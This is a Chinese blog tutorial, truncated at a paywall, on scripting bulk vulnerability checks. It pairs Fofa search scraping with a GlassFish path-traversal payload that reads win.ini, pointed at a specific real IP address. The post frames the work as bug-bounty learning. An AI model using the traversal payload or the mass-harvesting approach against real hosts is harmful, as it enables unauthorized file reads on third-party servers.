python安全开发——Fofa结果、POC批量提取验证&教育SRC

最新推荐文章于 2024-09-25 18:30:29 发布
最新推荐文章于 2024-09-25 18:30:29 发布
阅读量2.8k 收藏 14
点赞数 1
分类专栏: Python SRC挖掘 文章标签: 安全 python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qi_SJQ_/article/details/123059486
版权
本文介绍了使用Python进行安全开发的方法,包括利用Fofa进行目标搜索,提取验证POC,以及批量验证漏洞。通过示例展示了如何编写Python脚本批量收集Fofa搜索结果,对Glassfish任意文件读取漏洞进行验证,并讨论了教育SRC平台的信息提取。文章还提到了异常处理、延时策略和多线程优化。
摘要由CSDN通过智能技术生成

在这里插入图片描述
1.概述:

涉及技术 :Request 爬虫技术,lxml 数据提取,异常护理,Fofa 等使用说明。
目的: 掌握和利用公开或者 0day漏洞进行批量化的收集和验证脚本开发。

在这里插入图片描述

2.某漏洞 POC 验证脚本:

requests库使用参考:https://docs.python-requests.org/en/latest/

首先拿一个简单的例子:验证是否存在 glassfish 任意文件读取漏洞

过程:验证存在 glassfish 的应用是否存在任意文件读取漏洞 :两个 poc,分别对应 linux 和 windows 的。首先fofa关键字(“glassfish” && port=“4848”&&after=“2020-01-01”)搜索可能存在漏洞的网址,记下url,然后编写python脚本发起 get 请求,根据请求的响应状态码来判断是否存在漏洞:

import requests

url='http://186.202.17.69:4848/'
payload_linux='/'
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'

#data_linux=requests.get(url+payload_linux) #获取请求后的返回源代码
#data_windows=requests.get(url+payload_windows) #获取请求后的返回源代码

data_linux=requests.get(url+payload_linux).status_code #获取请求后的返回状态码
data_windows=requests.get(url+payload_windows).status_code #获取请求后的返回状态码

if data_linux==200 or data_windows==200:
    print("yes")
else:
    print("no")

#print(data_linux.content.decode('utf-8'))
#print(data_windows.content.decode('utf-8'))

原理很简单,就是发起一次http请求,不存在该文件就会返回404状态码。
在这里插入图片描述

3.Fofa搜索结果提取采集漏洞批量验证脚本:

上述只是针对单个目标的验证,那么如何批量提取fofa搜索到的结果、批量发起请求验证该漏洞呢?

首先是如何批量提取搜索结果:可以借助lxml库来提取fofa的结果(也可以正则表达式,没学过爬虫,不知道其他办法…),了解fofa的url搜索规则,对url进行base64处理、页数和条数显示:

#由于fofa最近被整改,修改了域名,而且目前仅限会员使用,无法完全适用了,但思路也可以用到其他搜索引擎上
#本来fofa也有接口可以直接调用查询的,这样写脚本适配url规则及写入cookie反而麻烦了,整改后不知道现在接口还能不能用。
import base64
import requests

search_data='"glassfish" && port="4848"'
url='https://fofa.info/result?&qbase64='
search_data_bs=str(base64.b64encode(search_data.encode("utf-8")), "utf-8")
urls=url+search_data_bs
print(urls)

得到的信息筛选出需要的,此时需要使用lxml库:
在这里插入图片描述

soup=etree.tostring(result
最低0.47元/天 解锁文章
暮w光
关注
专栏目录
Python安全开发——WEB爬虫库&数据解析库
m0_61506558的博客
02-08 798
这样我们就获取目标地址的html文本,紧接着就要处理返回数据,熟练的师傅可以使用re处理,这里使用入门级的Beautiful,基本语法参考下面文章。如果username=字典,password=字典, 进行批量发送,这不就是一个后台爆破脚本吗?请求方式&POST提交&带入请求头s回显处理&加入代理等。比如说我们需要获得a标签中的上海交通大学,我们尝试使用。再将爬取到的数据保持到本地文本中。这样就获取该class的内容。同样思路固定class值。再获取a标签里面的内容。
Python教程:如何用Python编写FOFA爬虫获取信息?
weixin_43263566的博客
05-28 2575
Python教程:如何用Python编写FOFA爬虫获取信息?
edusrc漏洞笔记(逻辑篇)
2301_80115097的博客
12-21 188
简单来说过程就是,a手机号验证码登录,抓包替换b手机号,b手机号收到的验证码(此时是第二个页面正常业务功能获取到的验证码)能用a手机号正常登录,原因是系统开发的时候可能是没有校验验证码接收者的用户身份,只校验了验证码发出的时间,导致b手机号接收的验证码越权登录a手机号的账号造成逻辑漏洞出现。不难发现这些工号都是有一定的规律的,可以尝试构造字典,不过我比较懒,而且构造出来很大一部分都是没有敏感信息的,所以另寻他径,开始寻找存储教职工信息的模块。可以看到这里有一个userkey的参数,对应刚才的职工号,
Python调用fofa API接口并写入csv文件中
qq_45212655的博客
03-18 2055
给大家介绍一下Python调用fofa的api接口并写入csv文件中的方法。先通过调研发现总体发送的请求是https://fofa.info/api/v1/search/all?&key=your_key&qbase64=dGl0bGU9ImJpbmci,在python中利用requests.get(url=url,params=data)的结构来发送请求,data = req.json()来拿到数据,后面再用csv库来将数据写到文件中。
网络空间搜索引擎- FOFA的使用技巧总结
最新发布
lza20001103的博客
09-25 2087
网络空间搜索引擎- FOFA的使用技巧总结
python小工具之fofa小脚本
win176489的博客
09-06 1414
python小工具之fofa小脚本 记录一个将python列表处理为csv文件的学习过程,并完成一个fofa查询的小工具编写 需要用到的库为如下库 import requests //request库,用来请求数据 import base64 //base64,进行base64编码 import pandas as pd //pandas库,数据处理,此处用来处理csv import csv ...
python爬虫脚本之fofa接口调用
qq_36585338的博客
07-23 748
【代码】python爬虫脚本之fofa接口调用。
fofa爬虫(python
qq_74925081的博客
08-20 951
【代码】fofa爬虫(python
使用python实现Api搜索Fofa网络空间资产
Black_Face_Kk的博客
03-26 851
从官网获取个人API和Email这里以city="Hangzhou"为例子,获取100条记录 获取的记录将保存到当前文件运行目录下
Python开发-批量Fofa&POC验证
weixin_45357474的博客
03-02 1361
Python开发-批量Fofa&POC验证 学习目的:掌握利用公开或0day漏洞进行批量化的收集及验证脚本开发 首先有一个基本的漏洞是应用服务器glassfish任意文件读取漏洞漏洞标题写的是任意文件读取漏洞,其实该漏洞同样可以列出对应目录文件,基本上等同于源代码泄露,各种敏感信息暴露无遗。 Linux服务器会读取etc/passwd文件的内容 windows服务器会读取windows/win.ini文件的内容 4848端口为glassfish默认开放的web管理端口 首先去fofa搜索一波 “
爬虫python漏洞群_python开发(2)-爬虫批量Fofa-POC验证-SRC提权
weixin_42481553的博客
02-05 365
importrequestsimportbase64from lxml importetreeimporttimeimportsys'''url='http://186.202.17.69:4848/'payload_linux='/'payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%...
python脚本之批量提取fofa漏洞IP
Aesthetic99的博客
03-29 9151
python脚本之批量提取fofa漏洞IP 前言: 本次python脚本是通过学习小迪师傅的课程学习而来,由于现在的fofa改变域名为fofa.info,所以下文中的python脚本中的一些值是根据目前的fofa网站改写的 脚本:(poc.py) import requests import base64 import time import sys from lxml import etree def fofa_search(search_data, page_data): #search_d
基于Python爬取fofa网页端数据过程解析
09-16
主要介绍了基于Python爬取fofa网页端数据过程解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
网络安全-Python 开发-批量 Fofa&SRC 提取&POC 验证
weixin_65409651的博客
06-20 146
涉及资源: https://fofa.so/ https://src.sjtu.edu.cn/ https://www.secpulse.com/archives/42277.html https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ 提取码: xiao。 Python 开发-Fofa 搜索结果提取采集脚本。 Python 开发-某漏洞 POC 验证批量脚本。
Python联合Fofa以及跑子域名
A485860941的博客
04-14 1092
Fofa 是一个可怕的搜索引擎,它不同于谷歌、百度等仅搜索爬取网页信息,Fofa用于。是非常重要的一部分,通常在一个主站进行防护完善的情况下找不到。我们将搜索内容直接存储到本地文件 方便我们下一步渗透测试。,其爬取的是互联网上所有设备的 IP 地址及其端口号.从第一页到第十页 可自行选择页数。点的话,我们可以考虑在。爆破,通过旁站C段进行。必不可少的一个阶段。
漏洞利用-PoC-in-GitHub+msf简单利用
xiaoheizi的博客
07-30 675
下载:https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html。也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。1.打开文件搜索应用,填写漏洞库的路径,漏洞关键字。搜索漏洞关键字获取漏洞利用模块,输入:search struts2。打开文件,里面有漏洞编号和许多漏洞利用地址链接。
【3】python 利用FOFA进行批量爆破
司徒荆的博客
09-03 1856
python 利用FOFA进行批量爆破
p77 Python 开发-批量 Fofa&SRC 提取&POC 验证
weixin_43263566的博客
03-07 1709
Python 开发-批量 Fofa&SRC 提取&POC 验证
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值